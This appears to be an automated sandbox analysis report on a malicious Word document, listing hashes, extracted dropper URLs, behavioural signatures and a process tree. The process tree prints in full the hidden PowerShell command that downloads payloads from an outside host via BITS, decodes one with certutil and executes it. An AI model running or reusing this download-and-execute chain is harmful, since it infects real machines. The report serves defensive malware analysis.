20faee2a8d4618002437bfcf80f4445bdb66c9b8323698a0f821f2600b1cde77

General

Target

lyft-d10193.doc
Size

132KB
MD5

ef24bc5c50c7755fa6b4574128156d2d
SHA1

123fa2d6eed535f06d29e482a51986271369da77
SHA256

20faee2a8d4618002437bfcf80f4445bdb66c9b8323698a0f821f2600b1cde77
SHA512

b810d208db30bf8a490eed5cca636c217e44d73fd54c406f93131cb16bb71b533ccb65b0164b990f706a6f1edd84015aef21894985d2b9c7f88af28ebe01218b

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://neoneo-bg.site/hIeak.dat

exe.dropper

http://neoneo-bg.site/geTask.dat

exe.dropper

http://neoneo-bg.site/rTTj.dat

Signatures

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

vido.comvido.com

pid process

1724 vido.com
1724 vido.com
1724 vido.com
1532 vido.com
1532 vido.com
1532 vido.com
Drops file in Windows directory 2 IoCs

Processes:

certutil.exe

description ioc process

File created (read-only) C:\Windows\cerA218.tmp certutil.exe
File deleted C:\Windows\cerA218.tmp certutil.exe
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1992 WINWORD.EXE

pid	process
1724	vido.com
1724	vido.com
1724	vido.com
1532	vido.com
1532	vido.com
1532	vido.com

description	ioc	process
File created (read-only)	C:\Windows\cerA218.tmp	certutil.exe
File deleted	C:\Windows\cerA218.tmp	certutil.exe

pid	process
1992	WINWORD.EXE

Suspicious use of WriteProcessMemory 3111 IoCs

Processes:

powershell.exevido.comvido.com

description	pid	process	target process
PID 1364 wrote to memory of 1716	1364	powershell.exe	certutil.exe
PID 1364 wrote to memory of 1716	1364	powershell.exe	certutil.exe
PID 1364 wrote to memory of 1716	1364	powershell.exe	certutil.exe
PID 1364 wrote to memory of 1724	1364	powershell.exe	vido.com
PID 1364 wrote to memory of 1724	1364	powershell.exe	vido.com
PID 1364 wrote to memory of 1724	1364	powershell.exe	vido.com
PID 1364 wrote to memory of 1724	1364	powershell.exe	vido.com
PID 1724 wrote to memory of 1532	1724	vido.com	vido.com
PID 1724 wrote to memory of 1532	1724	vido.com	vido.com
PID 1724 wrote to memory of 1532	1724	vido.com	vido.com
PID 1724 wrote to memory of 1532	1724	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com
PID 1532 wrote to memory of 1752	1532	vido.com	vido.com

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1364 powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1364 powershell.exe
Suspicious use of SendNotifyMessage 6 IoCs

Processes:

vido.comvido.com

pid process

1724 vido.com
1724 vido.com
1724 vido.com
1532 vido.com
1532 vido.com
1532 vido.com

description	pid	process
Token: SeDebugPrivilege	1364	powershell.exe

pid	process
1364	powershell.exe

pid	process
1724	vido.com
1724	vido.com
1724	vido.com
1532	vido.com
1532	vido.com
1532	vido.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXE

pid process

1992 WINWORD.EXE
1992 WINWORD.EXE
1992 WINWORD.EXE
1992 WINWORD.EXE
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1364 328 powershell.exe

pid	process
1992	WINWORD.EXE
1992	WINWORD.EXE
1992	WINWORD.EXE
1992	WINWORD.EXE

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1364	328	powershell.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\lyft-d10193.doc"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://neoneo-bg.site/hIeak.dat,http://neoneo-bg.site/geTask.dat,http://neoneo-bg.site/rTTj.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\rTTj.com\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera po15p; Start-Process vido.com -ArgumentList po15p
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
- Process spawned unexpected child process
PID:1364

C:\Windows\system32\certutil.exe
"C:\Windows\system32\certutil.exe" -decode sfera po15p
2⤵
- Drops file in Windows directory
PID:1716

C:\Users\Admin\AppData\Local\Temp\vido.com
"C:\Users\Admin\AppData\Local\Temp\vido.com" po15p
2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- Suspicious use of SendNotifyMessage
PID:1724

C:\Users\Admin\AppData\Local\Temp\vido.com
C:\Users\Admin\AppData\Local\Temp\vido.com po15p
3⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- Suspicious use of SendNotifyMessage
PID:1532

C:\Users\Admin\AppData\Local\Temp\vido.com
C:\Users\Admin\AppData\Local\Temp\vido.com
4⤵
PID:1752

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\po15p

Download Submit
memory/1752-9-0x0000000001080000-0x0000000012E9B000-memory.dmp

Filesize
286.1MB

Download
memory/1752-10-0x0000000001080000-0x0000000012E9B000-memory.dmp

Filesize
286.1MB

Download
memory/1752-11-0x0000000001080000-0x0000000012E9B000-memory.dmp

Filesize
286.1MB

Download
memory/1752-12-0x0000000001080000-0x0000000012E9B000-memory.dmp

Filesize
286.1MB

Download
memory/1992-3106-0x00000000024F0000-0x00000000024F4000-memory.dmp

Filesize
16KB

Download
memory/1992-3107-0x0000000007210000-0x0000000007214000-memory.dmp

Filesize
16KB

Download
memory/1992-3108-0x0000000004910000-0x0000000004914000-memory.dmp

Filesize
16KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads